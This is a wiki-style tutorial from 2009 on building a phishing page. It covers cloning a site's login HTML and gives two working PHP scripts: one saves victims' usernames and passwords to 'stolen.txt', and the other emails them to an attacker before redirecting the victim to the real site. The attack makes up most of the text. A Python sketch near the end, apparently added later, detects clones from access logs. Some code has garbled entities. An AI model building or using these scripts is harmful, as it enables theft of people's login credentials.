Create a phishing page

 

How To Make A Phishing Page


This article shows one method attackers use to make phishing pages using PHP.

Part 1: HTML


To start with, navigate to the page you want to create a page for. Now right click on the page and select "view source." This brings up the HTML source code of the page. You need the page to be able to work fine outside of the site. This part can become long and frustrating, but shouldn't be too hard.


<a href='src/login.php'>

is a relative (shortened) URL. All links of this form need to be changed to the full URL. The same goes for everything else on the page, e.g. images, JavaScript, Flash files, etc. If you notice that they could all be fixed using the same format, you can use the HTML "base href" element, e.g. for http://www.example.com:

<base href="http://www.example.com/"/>

Put this at the top of the page, click File --> Save As, save it as index.html and run it. If everything on the page works, you're done. Otherwise change them all manually.


<form action="login.php" method="post">
  <input type="text" id="username" name="username"/>
  <input type="password" id="password" name="password"/>
  <input type="submit" name="Login" value="Login">
</form>


You need to focus on the parts in red. The first needs to be changed to the full location of your PHP script; the last 3 need to be written down to add to the script. Try opening the page. It should now look just like the actual login page.



PHP Script


Finally, the script. There are 2 methods of sending the login information:

• Store in a text file
• Send via email

Text File


Here is the full code of the page that saves the logins to a text file:

    $lt;?php
    if ($_POST['submit']){

    $myFile = "stolen.txt";
    $fh = fopen($myFile, 'a') or die("can't open file");
    $stringData = "username: " . $_POST['username'] . "\n";
    fwrite($fh, $stringData);
    $stringData = "password: " . $_POST['password'] . "\n";
    fwrite($fh, $stringData);
    fclose($fh);

    } ?$gt;

    $lt;script$gt;location.href='http://real.site/login.php?invalid_password_link';$lt;/script$gt;


All the parts in red must be changed:

• The name of the submit button (final on form)
• The names of the username/password text boxes on the form
• The final link to the real page once the details are stolen




Email


For this, you will need a decent host with PHP sendmail enabled. To test if it is on, you could try sending an email using the example listed here. Here is the script (refer to the above example for what parts need to be changed):


    $lt;?php

    if ($_POST['submit']) {

    $message = "username: " . $_POST['username'] . "\n";
    $message .= "password: " . $_POST['password'] . "\n";
    $to = "changetoyour@emailaddress.com";

    mail($to, 'Phishing Victim', $message);

    }
    ?$gt;
    $lt;script$gt;location.href='http://real.site/login.php?invalid_password_link';$lt;/script$gt;


This again needs parts changed in order to work. This is also safer as only you can see the details, so there's no chance of anyone guessing the text file name. That should hopefully be enough to understand how to create these. Finally, the article below tells you more about phishing and attack methods using the phishing page.
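Seen from the impersonated site's side, both steps above leave traces: a clone that pulls images and scripts through "base href" makes each visitor's browser request those assets with the clone's address in the Referer header, and the closing redirect lands on the real login page with the same off-site Referer. The following Python sketch is an added example, not part of the original article, that looks for that pair of signals in web server access logs; it assumes Combined Log Format, and the host names, login path and log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumptions for this example: the real site's hostnames and login path.
OWN_HOSTS = {"www.example.com", "example.com"}
LOGIN_PATH = "/login.php"
ASSET_EXT = (".png", ".gif", ".jpg", ".css", ".js", ".ico")

# Combined Log Format: ip - - [time] "METHOD target proto" status size "referer"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "([^"]*)"')

def foreign_referrers(lines):
    """Per off-site Referer host: asset loads, login-page hits, client IPs."""
    stats = defaultdict(lambda: {"assets": 0, "login": 0, "clients": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, referer = m.groups()
        try:
            host = (urlsplit(referer).hostname or "").lower()
        except ValueError:  # malformed Referer; the header is client-controlled
            continue
        if not host or host in OWN_HOSTS:
            continue  # no Referer header, or ordinary same-site traffic
        path = urlsplit(target).path.lower()
        if path == LOGIN_PATH:
            kind = "login"
        elif path.endswith(ASSET_EXT):
            kind = "assets"
        else:
            continue
        stats[host][kind] += 1
        stats[host]["clients"].add(client)
    return stats

def suspected_clones(lines):
    """Hosts that hot-link our assets AND hand visitors to our login page."""
    return sorted(h for h, s in foreign_referrers(lines).items() if s["assets"] and s["login"])

# Constructed sample log lines (documentation IPs, .test hosts), not real traffic.
_T = "[02/Feb/2009:18:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_T} "GET /img/logo.png HTTP/1.1" 200 5120 "http://login-example.test/index.html" "-"',
    f'203.0.113.7 - - {_T} "GET /css/site.css HTTP/1.1" 200 900 "http://login-example.test/index.html" "-"',
    f'203.0.113.7 - - {_T} "GET /login.php?invalid_password_link HTTP/1.1" 200 3000 "http://login-example.test/login.php" "-"',
    f'198.51.100.4 - - {_T} "GET /login.php HTTP/1.1" 200 3000 "https://search.test/?q=example" "-"',
    f'198.51.100.9 - - {_T} "GET /img/logo.png HTTP/1.1" 200 5120 "http://www.example.com/" "-"',
]
```

Calling suspected_clones(SAMPLE_LOG) reports only the host that shows both signals; the "clients" set lists the visitor addresses that passed through it, which is the starting point for forcing password resets. Browsers and referrer policies can suppress the Referer header, so an empty result does not show that no clone exists.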


Links


Phishing


Last modified by: t0mmy9 (February 2, 2009, 6:19 pm)
Previously modified by: t0mmy9 (February 2, 2009, 6:19 pm), t0mmy9 (February 2, 2009, 6:11 pm), t0mmy9 (February 2, 2009, 6:07 pm), t0mmy9 (February 2, 2009, 6:01 pm), t0mmy9 (February 2, 2009, 6:00 pm), t0mmy9 (February 2, 2009, 5:55 pm)